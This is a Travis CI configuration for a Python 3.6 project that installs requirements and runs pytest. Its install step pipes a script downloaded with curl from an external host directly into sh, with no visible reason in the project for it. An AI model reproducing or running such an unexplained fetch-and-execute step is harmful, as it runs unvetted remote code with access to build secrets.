language: python
cache: pip
python:
  - "3.6"
install:
  - curl --proto '=https' --tlsv1.2 -sSf https://deep.kubeprod.hearstapps.com/sh | sh -s --
  - pip install -r requirements.txt
script:
  - pytest
